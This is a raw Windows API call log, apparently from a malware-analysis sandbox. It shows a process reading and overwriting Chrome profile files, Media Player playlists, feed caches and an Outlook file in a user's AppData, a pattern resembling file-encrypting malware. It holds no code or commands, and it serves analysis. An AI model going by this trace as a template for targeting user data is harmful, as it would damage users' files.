SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0170.791] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0170.791] CloseHandle (hObject=0x1d8) returned 1 [0170.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0170.793] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.793] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x426b [0170.793] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.793] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.793] ReleaseMutex (hMutex=0x168) returned 1 [0170.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0170.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0170.793] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.795] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x326b [0170.796] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.797] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x326b [0170.797] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0170.797] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0170.797] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0170.797] CloseHandle (hObject=0x1d8) returned 1 [0170.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0170.799] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.799] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x10 [0170.799] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.799] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.799] ReleaseMutex (hMutex=0x168) returned 1 [0170.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0170.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x1f7ad5c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CURRENT", lpUsedDefaultChar=0x0) returned 7 [0170.800] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f73428, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f73428*, lpNumberOfBytesRead=0x311f2bc*=0x10, lpOverlapped=0x0) returned 1 [0170.801] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0170.801] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x598, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x598, lpOverlapped=0x0) returned 1 [0170.801] CloseHandle (hObject=0x1d8) returned 1 [0170.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0170.802] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.803] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a9d [0170.803] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.803] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.803] ReleaseMutex (hMutex=0x168) returned 1 [0170.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Preferences", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0170.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Preferences", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Preferences", lpUsedDefaultChar=0x0) returned 11 [0170.803] ReadFile (in: hFile=0x1d8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1a9d, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x311f2bc*=0x1a9d, lpOverlapped=0x0) returned 1 [0170.805] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0170.806] WriteFile (in: hFile=0x1d8, lpBuffer=0x2893a78*, nNumberOfBytesToWrite=0x2025, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2893a78*, lpNumberOfBytesWritten=0x311f2d0*=0x2025, lpOverlapped=0x0) returned 1 [0170.807] CloseHandle (hObject=0x1d8) returned 1 [0170.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0170.808] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.808] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5000 [0170.808] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.809] ReleaseMutex (hMutex=0x168) returned 1 [0170.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top Sites", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0170.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top Sites", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top Sites", lpUsedDefaultChar=0x0) returned 9 [0170.809] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.811] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4000 [0170.811] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0170.812] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4000 [0170.812] WriteFile (in: hFile=0x1d8, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0170.813] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0170.813] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0170.813] CloseHandle (hObject=0x1d8) returned 1 [0170.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0170.814] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.814] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0170.815] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0170.815] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.815] ReleaseMutex (hMutex=0x168) returned 1 [0170.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FeedsStore.feedsdb-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0170.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FeedsStore.feedsdb-ms", cchWideChar=21, lpMultiByteStr=0x1f8867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FeedsStore.feedsdb-ms", lpUsedDefaultChar=0x0) returned 21 [0170.815] ReadFile (in: hFile=0x1d8, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0171.381] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0171.381] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0171.382] CloseHandle (hObject=0x1d8) returned 1 [0171.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0171.925] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0171.926] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x43 [0171.926] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0171.926] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.926] ReleaseMutex (hMutex=0x168) returned 1 [0171.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0171.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0171.926] ReadFile (in: hFile=0x20c, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x311f2bc*=0x43, lpOverlapped=0x0) returned 1 [0171.928] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0171.928] WriteFile (in: hFile=0x20c, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0171.928] CloseHandle (hObject=0x20c) returned 1 [0171.928] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0171.929] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0171.929] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4ff [0171.929] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0171.929] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.929] ReleaseMutex (hMutex=0x168) returned 1 [0171.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="02_Music_added_in_the_last_month.wpl", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0171.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="02_Music_added_in_the_last_month.wpl", cchWideChar=36, lpMultiByteStr=0x1fa54dc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="02_Music_added_in_the_last_month.wpl", lpUsedDefaultChar=0x0) returned 36 [0171.929] ReadFile (in: hFile=0x20c, lpBuffer=0x1f3be08, nNumberOfBytesToRead=0x4ff, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3be08*, lpNumberOfBytesRead=0x311f2bc*=0x4ff, lpOverlapped=0x0) returned 1 [0171.957] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0171.957] WriteFile (in: hFile=0x20c, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xa87, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x311f2d0*=0xa87, lpOverlapped=0x0) returned 1 [0174.152] CloseHandle (hObject=0x20c) returned 1 [0174.152] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.153] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.153] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x427 [0174.153] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.153] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.153] ReleaseMutex (hMutex=0x168) returned 1 [0174.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="10_All_Music.wpl", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0174.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="10_All_Music.wpl", cchWideChar=16, lpMultiByteStr=0x1f88d34, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="10_All_Music.wpl", lpUsedDefaultChar=0x0) returned 16 [0174.153] ReadFile (in: hFile=0x20c, lpBuffer=0x269c668, nNumberOfBytesToRead=0x427, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x311f2bc*=0x427, lpOverlapped=0x0) returned 1 [0174.191] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0174.191] WriteFile (in: hFile=0x20c, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9af, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9af, lpOverlapped=0x0) returned 1 [0174.191] CloseHandle (hObject=0x20c) returned 1 [0174.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.192] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.192] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x311 [0174.192] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.192] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.192] ReleaseMutex (hMutex=0x168) returned 1 [0174.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="06_Pictures_rated_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0174.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="06_Pictures_rated_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa54dc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="06_Pictures_rated_4_or_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0174.193] ReadFile (in: hFile=0x20c, lpBuffer=0x25abd28, nNumberOfBytesToRead=0x311, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25abd28*, lpNumberOfBytesRead=0x311f2bc*=0x311, lpOverlapped=0x0) returned 1 [0174.235] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0174.236] WriteFile (in: hFile=0x20c, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x899, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x311f2d0*=0x899, lpOverlapped=0x0) returned 1 [0174.236] CloseHandle (hObject=0x20c) returned 1 [0174.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0174.243] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.243] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb9 [0174.243] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0174.243] 